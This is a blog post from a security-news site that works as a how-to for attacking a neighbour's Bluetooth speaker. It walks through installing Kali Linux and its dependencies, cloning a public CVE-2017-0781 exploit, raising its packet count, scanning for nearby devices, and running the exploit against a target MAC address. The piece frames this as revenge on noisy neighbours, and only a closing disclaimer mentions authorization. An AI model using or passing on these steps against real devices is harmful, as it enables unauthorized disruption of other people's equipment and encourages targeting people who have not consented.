The post Fake Android update app infects thousands of smartphones appeared first on Information Security Newspaper | Hacking News.

We’ve all dealt with annoying neighbors who keep listening to music at a high volume, even in the early morning and thanks to their Bluetooth speakers, whist have became a must in most modern homes.

When kindness is not enough for neighbors to stop making noise, you can resort to a more assertive method. This time, network security specialists from the International Institute of Cyber Security (IICS) will show you how to spoil the operation of a Bluetooth speaker and other devices that depend on the use of this connection protocol.

Starting with the process

According to network security experts, you must install Kali Linux in your device before starting the attack: (https://www.kali.org/downloads/).

• For the exploit to work properly, you must install the following dependencies:

apt-get update

apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential

• Next we will update pwntools:

pip install --upgrade pip

pip install --upgrade pwntools

• Subsequently, network security experts mention that the libraries needed to work with Bluetooth will need to be installed

apt-get install bluetooth libbluetooth-dev

pip install pybluez

• Download the exploit using the following command:

git clone https://github.com/ojasookert/CVE-2017-0781

• In the downloaded Python file, network security experts recommend correcting the number of packets by changing the count variable to a minimum of 30k

Using the tool

• Now we scan the Bluetooth connection with the following command:

hcitool scan

• Select the device, copy its MAC address and type the command:

python CVE-2017-0781.py TARGET = <MAC address>

Running this command will send multiple requests to the affected device, resulting in a buffer overflow and preventing the Bluetooth speaker from working properly, thus solving its problems by outrageous neighbors.

IICS experts recommend using this technique only in controlled environments and, if possible, with the express authorization of the rest of the people involved. This tutorial is for educational and research purposes only. Don’t misuse this information.

The post Revenge your neighbor’s party by jamming any Bluetooth speaker. Creating a Bluetooth jammer with just 9 commands without any special hardware appeared first on Information Security Newspaper | Hacking News.